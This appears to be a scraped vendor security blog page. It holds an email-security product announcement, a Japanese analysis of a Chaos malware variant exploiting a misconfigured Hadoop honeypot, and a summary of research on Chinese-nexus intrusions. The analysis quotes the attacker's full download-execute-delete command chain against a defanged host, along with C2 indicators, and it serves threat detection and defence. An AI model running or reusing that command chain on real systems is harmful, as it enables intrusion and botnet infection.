ブログ
/
Email
/
April 7, 2024

Looking Beyond Secure Email Gateways with the Latest Innovations to Darktrace / EMAIL

In 2024, email security challenges have evolved far beyond inbound attacks, as cyber attackers increasingly leverage AI and employ multi-vector techniques that penetrate every facet of organizational communication. Read how the largest ever update to Darktrace / EMAIL introduces new innovations designed to address the nature of modern email threats.
Written by
Carlos Gray
Senior Product Marketing Manager, Email
Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
Carlos Gray
Senior Product Marketing Manager, Email
Default blog imageDefault blog imageDefault blog imageDefault blog imageDefault blog imageDefault blog image
07
Apr 2024

Organizations Should Demand More from their Email Security

In response to a more intricate threat landscape, organizations should view email security as a critical component of their defense-in-depth strategy, rather than defending the inbox alone with a traditional Secure Email Gateway (SEG). Organizations need more than a traditional gateway – that doubles, instead of replaces, the capabilities provided by native security vendor – and require an equally granular degree of analysis across all messaging, including inbound, outbound, and lateral mail, plus Teams messages.  

Darktrace/Email is the industry’s most advanced cloud email security, powered by Self-Learning AI. It combines AI techniques to exceed the accuracy and efficiency of leading security solutions, and is the only security built to elevate, not duplicate, native email security.  

With its largest update ever, Darktrace/Email introduces the following innovations, finally allowing security teams to look beyond secure email gateways with autonomous AI:

  • AI-augmented data loss prevention to stop the entire spectrum of outbound mail threats
  • an easy way to deploy DMARC quickly with AI
  • major enhancements to streamline SOC workflows and increase the detection of sophisticated phishing links
  • expansion of Darktrace’s leading AI prevention to lateral mail, account compromise and Microsoft Teams

What’s New with Darktrace / EMAIL  

Data Loss Prevention  

Block the entire spectrum of outbound mail threats with advanced data loss prevention that builds on tags in native email to stop unknown, accidental, and malicious data loss

Darktrace understands normal at individual user, group and organization level with a proven AI that detects abnormal user behavior and dynamic content changes. Using this understanding, Darktrace/Email actions outbound emails to stop unknown, accidental and malicious data loss.  

Traditional DLP solutions only take into account classified data, which relies on the manual input of labelling each data piece, or creating rules to catch pattern matches that try to stop data of certain types leaving the organization. But in today’s world of constantly changing data, regular expression and fingerprinting detection are no longer enough.

  • Human error – Because it understands normal for every user, Darktrace/Email can recognize cases of misdirected emails. Even if the data is correctly labelled or insensitive, Darktrace recognizes when the context in which it is being sent could be a case of data loss and warns the user.  
  • Unclassified data – Whereas traditional DLP solutions can only take action on classified data, Darktrace analyzes the range of data that is either pending labels or can’t be labeled with typical capabilities due to its understanding of the content and context of every email.  
  • Insider threat – If a malicious actor has compromised an account, data exfiltration may still be attempted on encrypted, intellectual property, or other forms of unlabelled data to avoid detection. Darktrace analyses user behaviour to catch cases of unusual data exfiltration from individual accounts.

And classification efforts already in place aren’t wasted – Darktrace/Email extends Microsoft Purview policies and sensitivity labels to avoid duplicate workflows for the security team, combining the best of both approaches to ensure organizations maintain control and visibility over their data.

End User and Security Workflows

Achieve more than 60% improvement in the quality of end-user phishing reports and detection of sophisticated malicious weblinks1

Darktrace/Email improves end-user reporting from the ground up to save security team resource. Employees will always be on the front line of email security – while other solutions assume that end-user reporting is automatically of poor quality, Darktrace prioritizes improving users’ security awareness to increase the quality of end-user reporting from day one.  

Users are empowered to assess and report suspicious activity with contextual banners and Cyber AI Analyst generated narratives for potentially suspicious emails, resulting in 60% fewer benign emails reported.  

Out of the higher-quality emails that end up being reported, the next step is to reduce the amount of emails that reach the SOC. Darktrace / EMAIL's Mailbox Security Assistant automates their triage with secondary analysis combining additional behavioral signals – using x20 more metrics than previously – with advanced link analysis to detect 70% more sophisticated malicious phishing links.2 This directly alleviates the burden of manual triage for security analysts.

For the emails that are received by the SOC, Darktrace / EMAIL uses automation to reduce time spent investigating per incident. With live inbox view, security teams gain access to a centralized platform that combines intuitive search capabilities, Cyber AI Analyst reports, and mobile application access. Analysts can take remediation actions from within Darktrace / EMAIL, eliminating console hopping and accelerating incident response.

Darktrace takes a user-focused and business-centric approach to email security, in contrast to the attack-centric rules and signatures approach of secure email gateways

Microsoft Teams

Detect threats within your Teams environment such as account compromise, phishing, malware and data loss

Around 83% of Fortune 500 companies rely on Microsoft Office products and services, particularly Teams and SharePoint.3

Darktrace now leverages the same behavioral AI techniques for Microsoft customers across 365 and Teams, allowing organizations to detect threats and signals of account compromise within their Teams environment including social engineering, malware and data loss.  

The primary use case for Microsoft Teams protection is as a potential entry vector. While messaging has traditionally been internal only, as organizations open up it is becoming an entry vector which needs to be treated with the same level of caution as email. That’s why we’re bringing our proven AI approach to Microsoft Teams, that understands the user behind the message.  

Anomalous messaging behavior is also a highly relevant indicator of whether a user has been compromised. Unlike other solutions that analyze Microsoft Teams content which focus on payloads, Darktrace goes beyond basic link and sandbox analysis and looks at actual user behavior from both a content and context perspective. This linguistic understanding isn’t bound by the requirement to match a signature to a malicious payload, rather it looks at the context in which the message has been delivered. From this analysis, Darktrace can spot the early symptoms of account compromise such as early-stage social engineering before a payload is delivered.

Lateral Mail Analysis

Detect and respond to internal mailflow with multi-layered AI to prevent account takeover, lateral phishing and data leaks

The industry’s most robust account takeover protection now prevents lateral mail account compromise. Darktrace has always looked at internal mail to inform inbound and outbound decisions, but will now elevate suspicious lateral mail behaviour using the same AI techniques for inbound, outbound and Teams analysis.

Darktrace integrates signals from across the entire mailflow and communication patterns to determine symptoms of account compromise, now including lateral mailflow

Unlike other solutions which only analyze payloads, Darktrace analyzes a whole range of signals to catch lateral movement before a payload is delivered. Contributing yet another layer to the AI behavioral profile for each user, security teams can now use signals from lateral mail to spot the early symptoms of account takeover and take autonomous actions to prevent further compromise.

DMARC

Gain in-depth visibility and control of 3rd parties using your domain with an industry-first AI-assisted DMARC

Darktrace has created the easiest path to brand protection and compliance with the new Darktrace / DMARC. This new capability continuously stops spoofing and phishing from the enterprise domain, while automatically enhancing email security and reducing the attack surface.

Darktrace / DMARC helps to upskill businesses by providing step by step guidance and automated record suggestions provide a clear, efficient road to enforcement. It allows organizations to quickly achieve compliance with requirements from Google, Yahoo, and others, to ensure that their emails are reaching mailboxes.  

Meanwhile, Darktrace / DMARC helps to reduce the overall attack surface by providing visibility over shadow-IT and third-party vendors sending on behalf of an organization’s brand, while informing recipients when emails from their domains are sent from un-authenticated DMARC source.

Darktrace / DMARC integrates with the wider Darktrace product platform, sharing insights to help further secure your business across Email Attack Path and Attack Surface management.

Conclusion

To learn more about the new innovations to Darktrace / EMAIL download the solution brief here.

All of the new updates to Darktrace / EMAIL sit within the new Darktrace ActiveAI Security Platform, creating a feedback loop between email security and the rest of the digital estate for better protection. Click to read more about the Darktrace ActiveAI Security Platform or to hear about the latest innovations to Darktrace / OT, the most comprehensive prevention, detection, and response solution purpose built for critical infrastructures.  

Learn about the intersection of cyber and AI by downloading the State of AI Cyber Security 2024 report to discover global findings that may surprise you, insights from security leaders, and recommendations for addressing today’s top challenges that you may face, too.

References

[1] Internal Darktrace Research

[2] Internal Darktrace Research

[3] Essential Microsoft Office Statistics in 2024

執筆者
Carlos Gray
Senior Product Marketing Manager, Email
Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
Carlos Gray
Senior Product Marketing Manager, Email

ダークトレースは新しいChaosマルウェア亜種によるクラウドの設定ミスのエクスプロイトを発見

April 7, 2026
Nathaniel Bill
Malware Research Engineer
Watch the NIS2 Webinar
よく読まれているブログ
1
ダークトレース、2026年度Gartner® CPS Protection Platforms部門のMagic Quadrant™ において唯一のVisionaryの評価を受ける
Mar 20, 2026
2
How Empowering End Users can Improve Your Email Security and Decrease the Burden on the SOC
May 8, 2024
3
Elevating Network Security: Confronting Trust, Ransomware, & Novel Attacks
Jun 21, 2024
4
The State of AI in Cybersecurity: Unveiling Global Insights from 1,800 Security Practitioners
Apr 9, 2024
5
The State of AI in Cybersecurity: The Impact of AI on Cybersecurity Solutions
May 13, 2024

More in this series

No items found.
さらに読む
Email
March 24, 2026

Darktrace Unites Human Behavior and Threat Detection Across Email, Slack, Teams, and Zoom

Introducing the adaptive era of email security: a unified platform that connects personalized coaching, collaboration tools, and user behavior into a self-improving defense system.
Carlos Gray
Senior Product Marketing Manager, Email
Read more
Email
December 18, 2025

Why Organizations are Moving to Label-free, Behavioral DLP for Outbound Email

Modern data loss doesn’t always look like a regex match. It can look like everyday communication slightly out of context. Here’s how a domain specific language model paired with behavioral learning protects labeled and unlabeled data without slowing business down.
Carlos Gray
Senior Product Marketing Manager, Email
Read more
Email
December 15, 2025

Beyond MFA: Detecting Adversary-in-the-Middle Attacks and Phishing with Darktrace

During a customer trial of Darktrace / EMAIL and Darktrace / IDENTITY, Darktrace detected an adversary-in-the-middle (AiTM) attack that compromised a user’s Office 365 account via a business email compromise (BEC) phishing email. Following the breach, the compromised account was used to launch both internal and external phishing campaigns.
Read more

Blog

/

/

April 7, 2026

ダークトレースは新しいChaosマルウェア亜種によるクラウドの設定ミスのエクスプロイトを発見

Default blog imageDefault blog image

はじめに

敵対者の行動をリアルタイムに観測するため、ダークトレースは“CloudyPots”と呼ばれるグローバルなハニーポットネットワークを運用しています。CloudyPotsは幅広いサービス、プロトコル、クラウドプラットフォームに渡って悪意あるアクティビティを捕捉するように設計されています。こうしたハニーポットはインターネットに接続されているインフラを狙う脅威のテクニック、ツール、マルウェアについて貴重な情報を提供してくれます。

ダークトレースのハニーポット内で標的とされたソフトウェアの一例は、Apacheが開発したオープンソースフレームワークであり、コンピュータクラスタで大規模なデータセットの分散処理を可能にするHadoopです。ダークトレースのハニーポット環境では、攻撃者がサービス上でリモートコードを実行できるよう、Hadoopインスタンスが意図的に誤設定されています。2026年3月に観測されたサンプルにより、ダークトレースはChaosマルウェアに関連する活動を特定し、詳しく調査することができました。

Chaosマルウェアとは?

Lumen社のBlack Lotus Labsで最初に発見されたChaosは、Goベースのマルウェアです[1]。サンプル内の文字列に中国語の文字が含まれていることや、zh-CNロケールのインジケーターが存在することから、中国起源であると推測されています。コードの重複があることから、ChaosはKaijiボットネットの進化形である可能性が高いと見られます。

Chaosはこれまでルーターを標的としており、主にSSHブルートフォース攻撃やルーターソフトウェアの既知のCVE(共通脆弱性識別子)を通じて拡散します。その後感染したデバイスをDDoS(分散型サービス拒否攻撃)ボットネットや、暗号通貨マイニングに使用します。  

Chaosマルウェア侵害についてのダークトレースの視点

攻撃は脅威アクターがHadoop環境上のエンドポイントに対して新しいアプリケーションを作成するリクエストを送信したことから始まりました。

The initial infection being delivered to the unsecured endpoint.
図1:保護されていないエンドポイントへの最初の感染

これは新しいアプリケーションを定義するもので、最初のコマンドをコンテナ内で実行することがam-container-specセクションのコマンドフィールドで指定されています。これによりいくつかのシェルコマンドが起動されます:

  • curl -L -O http://pan.tenire[.]com/down.php/7c49006c2e417f20c732409ead2d6cc0. - ファイルを攻撃者のサーバーからダウンロードします。この例ではChaosエージェントマルウェア実行形式です。
  • chmod 777 7c49006c2e417f20c732409ead2d6cc0. - すべてのユーザーが読み取り、書き込み、マルウェアを実行できる権限を設定します。
  • ./7c49006c2e417f20c732409ead2d6cc0. - マルウェアを実行します。
  • rm -rf 7c49006c2e417f20c732409ead2d6cc0. - 活動の痕跡を消すためにマルウェアファイルをディスクから削除します。

実際には、このアプリケーションが作成されると、攻撃者が定義したバイナリが攻撃者のサーバーからダウンロードされ、システム上で実行され、その後、フォレンジックデータ収集を防ぐために削除されます。ドメイン pan.tenire[.]com は以前、“Operation Silk Lure”と呼ばれる別のキャンペーンで観測されています。これは悪意のある求人応募履歴書を通じて ValleyRATというリモートアクセス型トロイの木馬(RAT)を配布していました。Chaosと同様に、このキャンペーンでは、偽の履歴書自体を含め、攻撃ステージ全体にわたって大量の漢字が使用されていました。このドメインは107[.]189.10.219に解決されます。これは低コストのVPSサービスを提供することで知られるプロバイダー、BuyVMのルクセンブルク拠点でホストされている仮想プライベートサーバー(VPS)です。

アップデートされたChaosマルウェアサンプルの分析

Chaosはこれまでルーターやその他のエッジデバイスを標的としており、Linuxサーバー環境の侵害は比較的新しい方向性です。ダークトレースがこの侵害で観測したサンプルは64ビットのELFバイナリですが、ルーターのハードウェアの大部分は通常ARM、MIPS、またはPowerPCアーキテクチャで動作し、多くは32ビットです。

この攻撃に使用されたマルウェアのサンプルは、以前のバージョンと比べて著しい再構築が行われています。デフォルトの名前空間は“main_chaos”から単に“main”に変更され、またいくつかの関数が再設計されています。これらの変更が行われていますが、systemdを介して確立される永続化メカニズムや、悪意のあるキープアライブスクリプトが/boot/system.pubに保存されるなど、中心的な特徴は維持されています。

The creation of the systemd persistence service.
図2:systemd 永続化サービスの作成

同様に、DDoS攻撃を実行する関数もこれまで通り存在し、以下のプロトコルを標的とするメソッドが含まれています:

  • HTTP
  • TLS
  • TCP
  • UDP
  • WebSocket

ただし、SSHスプレッダーや脆弱性エクスプロイトなどのいくつかの機能は削除されたようです。さらに、以前はKaijiから継承されたと考えられていたいくつかの機能も変更されており、脅威アクターがマルウェアを書き直したか、大幅にリファクタリングしたことを示唆しています。

このマルウェアの新しい機能はSOCKSプロキシです。マルウェアがコマンド&コントロール(C2)サーバーからStartProxyコマンドを受信すると、攻撃者が制御するTCPポートで待ち受けを開始し、SOCKS5プロキシとして動作します。これにより、攻撃者は侵害されたサーバーを経由してトラフィックをルーティングし、それをプロキシとして使用することが可能になります。この機能にはいくつかの利点があります。被害者のインターネット接続から攻撃を開始できるため、活動が攻撃者ではなく被害者から発生しているように見せかけられること、また侵害されたサーバーからのみアクセス可能な内部ネットワークに移動できる点です。

The command processor for StartProxy. Due to endianness, the string is reversed.
図3:StartProxyのコマンドプロセッサ。エンディアン性のため文字列が反転しています

以前、他のDDoSボットネット、たとえばAisuruなどでは、他のサイバー犯罪者にプロキシサービスを提供するためにピボットしているケースがありました。Chaosの開発者はこの傾向に注目し、同様の機能を追加することで収益化のオプションを拡大、自らのボットネットの機能を強化することにより、他の競合するマルウェア運営者から遅れをとらないようにしたものと思われます。

サンプルには埋め込みドメイン、gmserver.osfc[.]org[.]cnが含まれており、C2サーバーのIPを解決するために使用されていました。本稿執筆の時点ではドメインは70[.]39.181.70に解決され、これは地理位置情報が香港にあるNetLabelGlobalが所有するIPです。

過去には、このドメインは154[.]26.209.250にも解決されており、これは専用サーバーレンタルを提供する低コストVPSプロバイダー、Kurun Cloudが所有していました。マルウェアはコマンドの送信および受信にポート65111を使用しますが、どちらのIPも本稿執筆時点ではこのポート上で接続を受け入れている様子はありませんでした。

主なポイント

Chaosは新しいマルウェアではなく、その継続的進化はサイバー犯罪者がボットネットをさらに拡大し機能を強化しようと努力を重ねていることの現れです。過去に報告されているChaosマルウェアにも、すでに幅広いルーターCVEのエクスプロイト機能が含まれていました。そして最近のLinuxクラウドサーバー脆弱性を狙った進化により、このマルウェアの影響範囲はさらに広がります。

したがって、セキュリティチームがCVEへのパッチを行い、クラウド上で展開されているアプリケーションに対して強固なセキュリティ設定を行うことが重要となります。クラウド市場が成長を続ける一方で、使用できるセキュリティツールが追い付かない状況においてこのことは特に重要な意味を持ちます。

AisuruやChaos等のボットネットがプロキシサービスをコア機能に取り入れる最近の変化は、ボットネットが組織とセキュリティチームにもたらすリスクはもはやDoS攻撃だけではないことを意味します。プロキシにより攻撃者はレート制限を回避し痕跡を隠すことができ、より複雑な形のサイバー犯罪が可能になると同時に、防御者にとっては悪意あるキャンペーンを検知しブロックすることが格段に難しくなります。

担当: Nathaniel Bill (Malware Research Engineer)
編集: Ryan Traill (Content Manager)

侵害インジケーター (IoCs)

ae457fc5e07195509f074fe45a6521e7fd9e4cd3cd43e42d10b0222b34f2de7a - Chaos マルウェアハッシュ

182[.]90.229.95 - 攻撃者 IP

pan.tenire[.]com (107[.]189.10.219) - 悪意あるバイナリをホストしているサーバー

gmserver.osfc[.]org[.]cn (70[.]39.181.70, 154[.]26.209.250) - 攻撃者 C2 サーバー

参考資料

[1] - https://blog.lumen.com/chaos-is-a-go-based-swiss-army-knife-of-malware/

Continue reading
About the author
Nathaniel Bill
Malware Research Engineer

Blog

/

Network

/

April 2, 2026

How Chinese-Nexus Cyber Operations Have Evolved – And What It Means For Cyber Risk and Resilience 

Default blog imageDefault blog image

Cybersecurity has traditionally organized risk around incidents, breaches, campaigns, and threat groups. Those elements still matter—but if we fixate on individual incidents, we risk missing the shaping of the entire ecosystem. Nation‑state–aligned operators are increasingly using cyber operations to establish long-term strategic leverage, not just to execute isolated attacks or short‑term objectives.  

Our latest research, Crimson Echo, shifts the lens accordingly. Instead of dissecting campaigns, malware families, or actor labels as discrete events, the threat research team analyzed Chinese‑nexus activity as a continuum of behaviors over time. That broader view reveals how these operators position themselves within environments: quietly, patiently, and persistently—often preparing the ground long before any recognizable “incident” occurs.  

How Chinese-nexus cyber threats have changed over time

Chinese-nexus cyber activity has evolved in four phases over the past two decades. This ranges from early, high-volume operations in the 1990s and early 2000s to more structured, strategically-aligned activity in the 2010s, and now toward highly adaptive, identity-centric intrusions.  

Today’s phase is defined by scale, operational restraint, and persistence. Attackers are establishing access, evaluating its strategic value, and maintaining it over time. This reflects a broader shift: cyber operations are increasingly integrated into long-term economic and geopolitical strategies. Access to digital environments, specifically those tied to critical national infrastructure, supply chains, and advanced technology, has become a form of strategic leverage for the long-term.  

How Darktrace analysts took a behavioral approach to a complex problem

One of the challenges in analyzing nation-state cyber activity is attribution. Traditional approaches often rely on tracking specific threat groups, malware families, or infrastructure. But these change constantly, and in the case of Chinese-nexus operations, they often overlap.

Crimson Echo is the result of a retrospective analysis of three years of anomalous activity observed across the Darktrace fleet between July 2022 and September 2025. Using behavioral detection, threat hunting, open-source intelligence, and a structured attribution framework (the Darktrace Cybersecurity Attribution Framework), the team identified dozens of medium- to high-confidence cases and analyzed them for recurring operational patterns.  

This long-horizon, behavior-centric approach allows Darktrace to identify consistent patterns in how intrusions unfold, reinforcing that behavioral patterns that matter.  

What the data shows

Several clear trends emerged from the analysis:

  • Targeting is concentrated in strategically important sectors. Across the dataset, 88% of intrusions occurred in organizations classified as critical infrastructure, including transportation, critical manufacturing, telecommunications, government, healthcare, and Information Technology (IT) services.  
  • Strategically important Western economies are a primary focus. The US alone accounted for 22.5% of observed cases, and when combined with major European economies including Germany, Italy, Spain and the UK, over half of all intrusions (55%) were concentrated in these regions.  
  • Nearly 63% of intrusions of intrusions began with the exploitation of internet-facing systems, reinforcing the continued risk posed by externally exposed infrastructure.  

Two models of cyber operations

Across the dataset, Chinese-nexus activity followed two operational models.  

The first is best described as “smash and grab.” These are short-horizon intrusions optimized for speed. Attackers move quickly – often exfiltrating data within 48 hours – and prioritize scale over stealth. The median duration of these compromises is around 10 days. It’s clear they are willing to risk detection for short-term gain.  

The second is “low and slow.” These operations were less prevalent in the dataset, but potentially more consequential. Here, attackers prioritize persistence, establishing durable access through identity systems and legitimate administrative tools, so they can maintain access undetected for months or even years. In one notable case, the actor had fully compromised the environment and established persistence, only to resurface in the environment more than 600 days after. The operational pause underscores both the depth of the intrusion and the actor’s long‑term strategic intent. This suggests that cyber access is a strategic asset to preserve and leverage over time, and we observed these attacks most often inin sectors of the high strategic importance.  

It’s important to note that the same operational ecosystem can employ both models concurrently, selecting the appropriate model based on target value, urgency, intended access. The observation of a “smash and grab” model should not be solely interpreted as a failure of tradecraft, but instead an operational choice likely aligned with objectives. Where “low and slow” operations are optimized for patience, smash and grab is optimized for speed; both seemingly are deliberate operational choices, not necessarily indicators of capability.  

Rethinking cyber risk

For many organizations, cyber risk is still framed as a series of discrete events. Something happens, it is detected and contained, and the organization moves on. But persistent access, particularly in deeply interconnected environments that span cloud, identity-based SaaS and agentic systems, and complex supply chain networks, creates a major ongoing exposure risk. Even in the absence of disruption or data theft, that access can provide insight into operations, dependencies, and strategic decision-making. Cyber risk increasingly resembles long-term competitive intelligence.  

This has impact beyond the Security Operations Center. Organizations need to shift how they think about governance, visibility, and resilience, and treat cyber exposure as a structural business risk instead of an incident response challenge.  

What comes next

The goal of this research is to provide a clearer understanding of how these operations work, so defenders can recognize them earlier and respond more effectively. That includes shifting from tracking indicators to understanding behaviors, treating identity providers as critical infrastructure risks, expanding supplier oversight, investing in rapid containment capabilities, and more.  

Learn more about the findings of Darktrace’s latest research, Crimson Echo: Understanding Chinese-nexus Cyber Operations Through Behavioral Analysis, by downloading the full report and summaries for business leaders, CISOs, and SOC analysts here.  

Continue reading
About the author
Nathaniel Jones
VP, Security & AI Strategy, Field CISO
あなたのデータ × DarktraceのAI
唯一無二のDarktrace AIで、ネットワークセキュリティを次の次元へ